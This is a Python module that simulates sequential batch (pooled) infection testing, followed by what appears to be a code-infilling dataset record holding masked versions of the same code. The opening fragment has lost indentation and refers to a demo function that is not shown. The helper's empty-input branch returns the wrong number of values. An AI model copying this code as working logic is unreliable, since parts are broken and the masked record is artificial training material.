typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
        individual_con (int): the test consumption for individual testings
        node (list): for each subject, the string of '+'/'-' batch results on its path
        batch_num_list (list): the cumulative batch-test consumption recorded as the search proceeds
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size,
'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
typeII_error, typeI_error,
batch_limit = batch_limit)
temp0 = {'data': temp0,
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': n0,
'node': i['node'] + '-'}
temp1 = {'data': temp1,
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': n1,
'node': i['node'] + '+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:,0]]
neg_node.append(temp)
    neg_array = np.concatenate(neg_array)
    for k in pos_list:
        pos_array.append(k['data'])
        temp = [[x, k['node']] for x in k['data'][:,0]]
        pos_node.append(temp)
    pos_array = np.concatenate(pos_array)
    # subjects cleared by the negative stopping rule are reported as negative
    neg_array[:,1] = 0
    # subjects on repeatedly positive batches are resolved by individual testing
    individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
    pos_array = individual_test
    consum += individual_con
    result = np.concatenate((pos_array, neg_array))
    # pair every subject id with its splitting path, sort by subject id, and keep the paths
    pos_node.extend(neg_node)
    node = [pair for group in pos_node for pair in group]
    node.sort()
    node = [x[1] for x in node]
    result = result[result[:,0].argsort()]
    result = result.astype('int64')
return (result, consum, individual_con, node, batch_num_list)
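
# Illustrative sketch (not part of the original code): seq_test_with_node returns,
# beyond the results and consumption counts, the '+'/'-' path ("node") each subject
# followed and the cumulative batch-test consumption after every splitting round.
# The assumptions are the same as in _demo_seq_test above.
def _demo_seq_test_with_node(seed=0):
    rng = np.random.default_rng(seed)
    size, p = 200, 0.05
    cohort = np.column_stack((np.arange(size), rng.binomial(1, p, size)))
    result, consum, ind_con, node, batch_num_list = seq_test_with_node(
        cohort, stop_rule=2, p=p, batch_size=8,
        typeII_error=0.05, typeI_error=0.01)
    # result and node are both sorted by subject id, so node[i] is the splitting
    # path of the subject with id result[i, 0]; batch_num_list grows by one entry
    # per splitting round.
    return result, node, batch_num_list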
|
flexible
|
{
"blob_id": "e564e0d05c3c0e60f356422722803df510d9dd0b",
"index": 281,
"step-1": "<mask token>\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy 
Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\n<mask token>\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate 
of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-2": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of 
type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n 
temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\n<mask token>\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
